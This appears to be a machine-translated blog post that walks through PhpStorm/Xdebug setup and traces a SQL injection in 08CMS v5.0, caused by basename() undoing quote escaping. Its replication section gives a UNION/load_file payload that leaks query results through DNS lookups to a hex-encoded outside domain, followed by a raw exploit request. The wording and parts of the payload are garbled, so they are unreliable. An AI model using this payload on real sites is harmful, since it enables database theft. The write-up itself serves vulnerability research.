Dynamic Analysis Small Sample | 08CMS SQL Injection Analytics

Last Update:2018-04-10 Source: Internet

Author: User

Tags sql injection vc9

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

I spring and autumn writer: YANZM

0x00 background

This week, get a source material is 08cms, this source code in the official website does not open source download, need to buy, by a teacher to provide, audit time found this CMS data transfer more complex, use static analysis of the way bad operation, just this week small three upper (new computer), On the direct installation of Phpstorm+xdebug+xdebug-ext (Firefox) for dynamic analysis, this article is a SQL injection vulnerability as an example, the dynamic analysis of the drill, of course, the source code and other loopholes to be excavated, expect the teachers to exchange discussions.

0X01 Audit Process Dynamic Analysis environment configuration

Dynamic analysis combination: Phpstorm+xdebug+xdebug-ext (Firefox)

I believe that the small partners concerned about the public number so long this environment building should be no problem, here I will list a few configuration points. If you do not understand, you can refer to: http://www.cnblogs.com/xujian2016/p/5548921.html

Settings for PHP

First, according to the PHP version of the computer to download the appropriate Xdebug plug-in \php\php-5.3.29-nts\ext\php_xdebug-2.2.7-5.3-vc9-nts.dll,:https://xdebug.org/download.php

Then configure the following configuration in the php.ini file to see if the Xdebug in Phpinfo is in effect after the configuration is complete.

[XDebug]

zend_extension= "D:\soft\phpStudy\PHPTutorial\php\php-5.3.29-nts\ext\php_xdebug-2.2.7-5.3-vc9-nts.dll"

Xdebug.profiler_append = 0

xdebug.profiler_enable = 1

Xdebug.profiler_enable_trigger = 0

Xdebug.profiler_output_dir= "D:\soft\phpStudy\PHPTutorial\tmp\xdebug"

Xdebug.trace_output_dir= "D:\soft\phpStudy\PHPTutorial\tmp\xdebug"

Xdebug.profiler_output_name = "cache.out.%t-%s"

xdebug.remote_enable = 1

Xdebug.remote_handler = "DBGP"

Xdebug.remote_host = "127.0.0.1″

Xdebug.remote_port = 9000

Xdebug.idekey = Phpstorm

Settings for Phpstorm

Configure the runtime environment to load the location where the Php.exe is located.

Configure the debug port, which by default is 9000 consistent with the debug port in php.ini.

Configure the proxy port and IDE key, and the port is consistent with the site port.

At the edit structure, make the following settings:

Xdebug-ext (Firefox)

Firefox is best to use the developer version or many plugins won't work.

After installing the Xdebug-ext plugin, configure the IDE key in the settings.

Basic use

When accessing the target page to be debugged, turn on phpstorm Debug Connection monitor, that is the small phone.

Then Firefox opens the little ladybird.

When the request is turned on, it will be automatically xdebug_session=phpstorm,ide and can be debugged.

SQL injection Problem 0x00 related environment

SOURCE information: 08cms_v5.0_gbk_20140314

Question file: \08cms\08cms_v5.0_gbk_20140314\upload_gbk\include\field.fun.php

Vulnerability type: SQL injection problem

Site Address: http://www.08cms.com/

0x01 Vulnerability Analysis

This 08cms source material data transfer is more complex, so there is no way to use notepad++ for static tracking and auditing, but instead of using Phpstorm+xdebug+xdebug-ext (Firefox) combination, dynamic analysis and data flow tracking.

On the left basic information--basic information--member details-upload attachment above the input box, after a brief test, know that this place is the image path after uploading.

In the See box on the plug-in habit (storing the path of the input box Code rules complex), began to test, found that the location can introduce single quotation marks.

However, when constructing the SQL statement, it is found that the location has the input data processing, so the black box is not a good way to construct payload, so start debugging, because the submitted form link is http://127.0.0.1:8081/adminm.php? action=memberinfo_pthy&mid=2, so I set a breakpoint on line 10th in the file \08cms\08cms_v5.0_gbk_20140314\upload_gbk\adminm.php.

First, turn on the phone tag in the Phpstorm and listen for the debug connection.

Then the form submitted, open Xdebug-ext (Firefox) will automatically hit the Debug IDE Key, and then all the way F8 step, know to run to the breakpoint F7 step into, and then still F8.

Enter \08cms\08cms_v5.0_gbk_20140314\upload_gbk\libs\classes\frontpage\ on the 2nd time The end of line 15th in the adminmpagebase.cls.php file is finished, and after the end of the SQL log, the SQL can be introduced into the single quotation mark, so the breakpoint is in this position.

After repeated the next breakpoint F8 step and F7 into, run to the end of the location of the breakpoint, the next time the code executes to that position F7 step into. Eventually traced to the problematic block of code.

The following is the position of the breakpoint at the time of my tracking, which is the process of code running and data passing.

After confirming the location of the problem code, you can remove the other breakpoints, then keep only the breakpoint at the critical position, \08cms\08cms_v5.0_gbk_20140314\upload_gbk\include\ field.fun.php Here I only keep the 150th breakpoint.

By parsing the code block, the value of the variable is displayed on the right side of the code when it is debug, found to be processed by the | and #, and then passed into the SQL statement after basename processing, and 08cms is escaping the single quotes of the passed arguments. Although the single quotes are escaped here, the backslash is eaten by the basename, which introduces the single quotation mark into the SQL statement, resulting in SQL injection.

0x02 Vulnerability Replication

The following request can be made at Fmdata[mlogo] location ' Union Select Load_file (CONCAT (0x5c5c, (select Hex (group_concat) from Mname where 1 LIMIT 1), 0x2e6d7973716c2e38353731653539342e326d312e70772f2f616263) – Incoming this payload, you can query the data in the database, you need to note that When constructing payload, in addition to the opening single quotation marks, other places to avoid the use of single quotation marks, otherwise, because the single quotation mark is escaped as \ ', after basename will break the structure of the statement.

POST [Url]http://127.0.0.1:8081/adminm.php?action=memberinfo_pthy&mid=2[/url] http/1.1

host:127.0.0.1:8081

Proxy-connection:keep-alive

content-length:1563

Cache-control:max-age=0

Origin: [Url]http://127.0.0.1:8081[/url]

Upgrade-insecure-requests:1

user-agent:mozilla/5.0 (Windows NT 10.0; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/55.0.2883.87 safari/537.36

Content-type:multipart/form-data; boundary=--webkitformboundaryhubb3majcygbjr0q

accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Referer: [Url]http://127.0.0.1:8081/adminm.php?action=memberinfo_pthy[/url]

Accept-encoding:gzip, deflate, BR

accept-language:zh-cn,zh;q=0.8

Cookie:vgm_userauth=icwfvar8isej5t3p9bvhw%2bzltvqmlhl8vms0iij3zoeol2%2fa%2fax8vtdh